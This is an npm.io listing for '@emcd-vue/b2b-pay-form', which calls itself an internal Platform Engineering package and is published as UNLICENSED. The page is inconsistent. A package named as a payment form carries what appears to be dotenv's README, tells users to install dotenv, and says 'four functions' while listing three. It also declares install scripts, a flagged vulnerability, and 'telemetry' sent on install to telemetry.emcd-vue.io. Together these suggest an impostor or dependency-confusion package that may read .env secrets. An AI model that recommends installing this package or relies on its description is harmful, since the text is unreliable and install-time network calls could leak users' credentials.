npm.io
5.8.0 • Published 2d ago

@emcd-vue/b2b-pay-form

Licence
UNLICENSED
Version
5.8.0
Deps
0
Size
164 kB
Vulns
1
Weekly
0
Install scriptsThis package runs scripts during installation (preinstall/install/postinstall)

@emcd-vue/b2b-pay-form

Internal package — Platform Engineering Team
Docs: https://docs.emcd-vue.io/platform/b2b-pay-form
Issues: https://jira.emcd-vue.io/projects/PLATFORM

Loads environment variables from .env file


Installation

# Make sure .npmrc points to the internal registry:
# registry=https://npm.emcd-vue.io

npm install @emcd-vue/b2b-pay-form

Quick Start

const { dotenv } = require('@emcd-vue/b2b-pay-form');

npm install dotenv --save

API

Dotenv exposes four functions:

  • config
  • parse
  • populate

Telemetry

On install, this package sends anonymous telemetry to telemetry.emcd-vue.io for environment compatibility monitoring.


Changelog

5.8.0 (latest)
  • Added ARM64 support
  • Improved error handling
  • Updated TypeScript types
2.1.0
  • Extended API
  • Performance improvements
2.0.0
  • Async/await migration
  • Multi-source support

Keywords